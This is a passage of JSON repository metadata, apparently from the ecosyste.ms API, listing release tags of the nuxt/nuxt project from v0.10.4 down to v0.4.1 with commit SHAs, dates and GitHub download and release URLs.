t/tar.gz/v0.10.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4/manifests"},{"name":"v0.10.3","sha":"c9784651e9c482ad90ec9c39359ac9dfd1e199bf","kind":"commit","published_at":"2017-03-25T11:57:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"77439223cfb9d3c64928d8888113898f4b1fa5d3","kind":"commit","published_at":"2017-03-25T11:36:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"ea5881e64a797ded299740017391f36ea7f94e09","kind":"commit","published_at":"2017-03-25T02:41:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"bfe62b7d71d4ac64a4d411a83cec808824082b4f","kind":"commit","published_at":"2017-03-24T18:05:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0/manifests"},{"name":"v0.9.9","sha":"df04b959c219789621f1f4ce239fb2f64c069eee","kind":"commit","published_at":"2017-02-10T23:41:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9/manifests"},{"name":"v0.9.8","sha":"e7f0200a58f17d429b00641d015e6f7f87f99fd0","kind":"commit","published_at":"2017-02-10T01:22:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8/manifests"},{"name":"v0.9.7","sha":"8d17d20dba2a81072173c68fa774d7a49cae716a","kind":"commit","published_at":"2017-01-30T11:41:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7/manifests"},{"name":"v0.9.6","sha":"1556787e0164bdb4b15542dedf32762c481f274c","kind":"commit","published_at":"2017-01-15T16:33:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6/manifests"},{"name":"v0.9.5","sha":"42a3b007514eea3e87a4bd0c083dad6524ecfead","kind":"commit","published_at":"2016-12-27T16:07:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5/manifests"},{"name":"v0.9.4","sha":"05be1ed6b12e7d88fe7adc2af5ed0568cf40ddb0","kind":"commit","published_at":"2016-12-25T20:15:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4/manifests"},{"name":"v0.9.3","sha":"1fc685a88037fdac0b826d8d814fcd1c3b320fda","kind":"commit","published_at":"2016-12-24T18:00:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3/manifests"},{"name":"v0.9.2","sha":"2a9519e7203004955ffc70f0c8f762e6afeb9816","kind":"commit","published_at":"2016-12-23T12:09:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"baaaefbf2c76f362fd0be9f34c1444e439e8c746","kind":"commit","published_at":"2016-12-20T11:55:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"004e21b929b901ae54d92abf339c51a9d666b373","kind":"commit","published_at":"2016-12-19T19:37:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0/manifests"},{"name":"v0.8.8","sha":"803b21bf17a21bac5eb97d84de35fa7d08c3b73e","kind":"commit","published_at":"2016-12-09T19:10:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8/manifests"},{"name":"v0.8.6","sha":"d482711cbe2a9f50a6a4804bdf1292739dd581ab","kind":"commit","published_at":"2016-12-09T12:52:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6/manifests"},{"name":"v0.8.5","sha":"151bd73b8250816c3918e52777e9a7387df7be4a","kind":"commit","published_at":"2016-12-09T12:46:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"e254e1117736f73a3455b0f795e9f9bd9e0364ab","kind":"commit","published_at":"2016-12-08T20:15:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"4895433d3383407dd243acc0718bc9fa33ad28ff","kind":"commit","published_at":"2016-12-08T10:43:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3/manifests"},{"name":"v0.8.2","sha":"40e28de226dbefd24e228c801b28892ca91e33e4","kind":"commit","published_at":"2016-12-07T22:58:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"78a2c5afe747c7009ff618a79f14ddf83c19efed","kind":"commit","published_at":"2016-12-07T22:44:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"be5e8c118d1415e33031772daca422a0fae511bf","kind":"commit","published_at":"2016-12-07T18:43:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0/manifests"},{"name":"v0.7.9","sha":"8801327db20c2e5daa594a7d8ad95d7a2a582a14","kind":"commit","published_at":"2016-12-04T18:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9/manifests"},{"name":"v0.7.8","sha":"ddbffcc8af4393e14cc44daa94b4a27a21c6fadf","kind":"commit","published_at":"2016-12-01T18:09:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8/manifests"},{"name":"v0.7.7","sha":"fdc430b23bac4a0cf86b0bc0da7828a573a0176d","kind":"commit","published_at":"2016-11-28T16:28:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7/manifests"},{"name":"v0.7.6","sha":"53499f2a6b0ebf7514f984f6d81ce76ab9aaeb09","kind":"commit","published_at":"2016-11-27T17:46:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6/manifests"},{"name":"v0.7.5","sha":"3ed1340d568c36f65bfe66618f9ac8119e8408de","kind":"commit","published_at":"2016-11-27T17:13:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5/manifests"},{"name":"v0.7.4","sha":"bcf291b54761b64c271573e045e9275f189c3bea","kind":"commit","published_at":"2016-11-25T16:58:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4/manifests"},{"name":"v0.7.3","sha":"cb1994319cd920b77181d852daf79a9c2c51b25c","kind":"commit","published_at":"2016-11-25T14:37:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3/manifests"},{"name":"v0.7.2","sha":"4b9fb87c860f69d4b5044533aee0c16310b10aa1","kind":"commit","published_at":"2016-11-24T13:41:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"d984c8803d9dd1e58c56a08b97f7d38ba5cb92b7","kind":"commit","published_at":"2016-11-24T12:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"40515ac91a9e4ae5fd7b4a37c75de2843f6d3fbc","kind":"commit","published_at":"2016-11-24T00:47:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0/manifests"},{"name":"v0.6.9","sha":"5b35834f42aa6cea3724f098787587a86ec6f4c3","kind":"commit","published_at":"2016-11-23T13:05:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8/manifests"},{"name":"v0.6.7","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"fc598ea66e1249645ed3677d8725efc1c048ba2d","kind":"commit","published_at":"2016-11-22T23:27:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"2400fabceb3b76b756efc8ede2919a4ccb088345","kind":"commit","published_at":"2016-11-21T18:53:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5/manifests"},{"name":"v0.6.0","sha":"edd0227e746c2ecde781915bd8c59e98f399439a","kind":"commit","published_at":"2016-11-21T13:15:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0/manifests"},{"name":"v0.5.2","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2/manifests"},{"name":"v0.5.3","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3/manifests"},{"name":"v0.5.1","sha":"8cbbaeaf838e33bb6e23f06e15724b39042c5206","kind":"commit","published_at":"2016-11-20T10:37:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"e48f8250a084202fbc492df55f13e3803e2b74cf","kind":"commit","published_at":"2016-11-18T13:45:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0/manifests"},{"name":"v0.4.9","sha":"d4b8bc4f022459c976b41cb9845be38759a0481a","kind":"commit","published_at":"2016-11-18T09:38:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9/manifests"},{"name":"v0.4.8","sha":"d928c9e5970e9d08eec61fe6770325d8c74e6d5b","kind":"commit","published_at":"2016-11-18T08:19:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"49f67566c2d74a661421be1589279b316dcc9e49","kind":"commit","published_at":"2016-11-17T21:12:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.7/manifests"},{"name":"v0.4.6","sha":"06edc8029b796b8008fe52a682159636d10f3e7a","kind":"commit","published_at":"2016-11-17T13:02:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.6/manifests"},{"name":"v0.4.4","sha":"2677afb46fc4a950d62f32e6172aeaa2fdcc5a8b","kind":"commit","published_at":"2016-11-17T10:57:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.4/manifests"},{"name":"v0.4.3","sha":"a98e6d4e9bda0491bf8f32815701f42f28c793a2","kind":"commit","published_at":"2016-11-16T17:41:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.3/manifests"},{"name":"v0.4.2","sha":"d2c0f01593e669147396ff25c4a017372a8390ea","kind":"commit","published_at":"2016-11-16T17:06:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.2/manifests"},{"name":"v0.4.1","sha":"b1546682ef7ce3f9ead26f328417d2589875ef46","kind":"commit","published_at":"2016-11-16T16:55:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.1","manifests_url":"